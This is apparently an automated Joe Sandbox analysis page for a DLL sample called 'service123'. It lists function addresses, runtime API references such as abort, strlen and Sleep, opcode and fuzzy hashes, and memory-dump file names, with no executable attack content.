Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: f3453a2c62e80c247dff9d00401451107b6acd4afedd1bf925a34ed7fea82722
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: 64C01235A492398B8340AE9491604E9B274AB4B304F093D54D905B3B04CB74E88ED541

Function 6CA2BDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: 037d5a5babd5bb9da476ed46e4d62c406663c2f7982abdf6229d95c54b3df427
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: E7C08C30DCC33D4702403D2922B04B8B2A50B07224B0A3F14C809B3F00CF2BDCCE8044

Function 6CA2C150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d34cf896a4381216a0348bcd2855cc42ebdaa80b27568d5ea09a8de904b34061
Instruction ID: 844902b053fb59df78ed5c0a708801ae1fcf5e11ca8a8fb6493fc40db98a1210
Opcode Fuzzy Hash: d34cf896a4381216a0348bcd2855cc42ebdaa80b27568d5ea09a8de904b34061
Instruction Fuzzy Hash: A4B1D171A083568FE710DF18C48075ABBE1BF8630CF1C496DE9959BB42C379E885CB92

Function 6CA2C470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 15a6a1ccac3d6f38d95e8eb87865af7754e2bb06f9cbed87cc1cd9b0405dcb3b
Instruction ID: e76ef0ad4021a516b8803e13e229cd6c7d66185a9dd7a4198fc9091030c82cdd
Opcode Fuzzy Hash: 15a6a1ccac3d6f38d95e8eb87865af7754e2bb06f9cbed87cc1cd9b0405dcb3b
Instruction Fuzzy Hash: DD41BFB1A412249FCB00DF68C4917E9BBF5BF49348F1C856AD859DF782D339D4858B50

Function 6CA2D370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA2CD00: strlen.MSVCRT ref: 6CA2CD7D

Sleep.KERNEL32 ref: 6CA2D4D7
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: 9852f064f1b91a98d62b4549efb6d10582ac13033aa3a53590d73ca6b0e8e777
Instruction ID: 8decc34a188490842ce4033fee8f441b2a79367b234e2fa24243564384a39ea8
Opcode Fuzzy Hash: 9852f064f1b91a98d62b4549efb6d10582ac13033aa3a53590d73ca6b0e8e777
Instruction Fuzzy Hash: A151C8E060E3D1CAEB11EB39C0497057FB8775330DF188558C6886B78AD3FA9549C766

Function 6CA2D570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: c841ef40746e36c859f389d022e90e406c388b496a54aacc4b1301dafa76022e
Instruction ID: 7987b1d57f40442a638012e68ce8b1fe69d4fc94ca9cd7ac3a4045ebd847fe60
Opcode Fuzzy Hash: c841ef40746e36c859f389d022e90e406c388b496a54aacc4b1301dafa76022e
Instruction Fuzzy Hash: 0731D570A193568FE3109F69D580BAAB7E4AFC5308F1C892DE598D7B02D338D4C9CB81

Function 6CA2D67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: f64cc48192b08359c0712de60ed0cda7a23f28b9f3274a386a39a1edf048f7ad
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: 29B01230CC9538C341803BB507600B5B2385F033447007D00961EF3E014F20F8CF9054

Function 6CA2D6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 14750aa99d606a160c65b0086397e5b8b4e38d976c4535c6d20e4080c350b105
Instruction ID: e186a3a5df4a2de9101ecd3b32efa54c8427590a000ad0043766c8e25f796e42
Opcode Fuzzy Hash: 14750aa99d606a160c65b0086397e5b8b4e38d976c4535c6d20e4080c350b105
Instruction Fuzzy Hash: 44412B70A093518FE310DF19C58075ABBE1EF89708F188D2EE599C7B52D379D888CB92

Function 6CA2D855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: c8bf80833a6a457c685dbbdb723af65c04358ee576a60830f4d8b21e8eaddb78
Instruction ID: 014cd858e682b10648dbbc18325522866fa24f7bcd556c9ff45ba0a01827efbd
Opcode Fuzzy Hash: c8bf80833a6a457c685dbbdb723af65c04358ee576a60830f4d8b21e8eaddb78
Instruction Fuzzy Hash: 3CE0E570D0926A4BD300EF28C1843257BA1AF4330CF181D48D55567B42C378A88FC741

Function 6CA3C330 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA3C3A1
fwrite.MSVCRT ref: 6CA3C448
fputs.MSVCRT ref: 6CA3C465
fwrite.MSVCRT ref: 6CA3C48E
fputs.MSVCRT ref: 6CA3C4AD
fwrite.MSVCRT ref: 6CA3C4DC
fwrite.MSVCRT ref: 6CA3C50E
abort.MSVCRT ref: 6CA3C513
abort.MSVCRT ref: 6CAF6157
free.MSVCRT ref: 6CAF615F

Part of subcall function 6CA2A340: strlen.MSVCRT ref: 6CA2A3C5
Part of subcall function 6CA2A340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6CA3C41C), ref: 6CA2A3E0
Part of subcall function 6CA2A340: free.MSVCRT ref: 6CA2A3EA

Strings

terminate called without an active exception, xrefs: 6CA3C4D5
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6CA3C349
terminate called after throwing an instance of ', xrefs: 6CA3C441
-, xrefs: 6CA3C4C1

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: 1c58ea73ab4be922c066011ef6abf588f7e890ac7e22ef8cb310bd0d7619f83b
Instruction ID: 4f6fcd820e7cb714909a4e110d4c26edc40d1d77bfe0c8a2d9b12cefafad2b3d
Opcode Fuzzy Hash: 1c58ea73ab4be922c066011ef6abf588f7e890ac7e22ef8cb310bd0d7619f83b
Instruction Fuzzy Hash: 63512AB09083299FD700AF74C58579ABBE4AF85308F04DA1DE4D987741DB74948ADF53

Function 6CA2D8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 37b38657217a706d39ccc4c2089e54b479c61993ae6bc1e8c30bc91a4a1aa2ba
Instruction ID: 1a8dc6c2084b601065b6de5e6ae2c5cd483aab3bad58206f5e2cc6b0989580ac
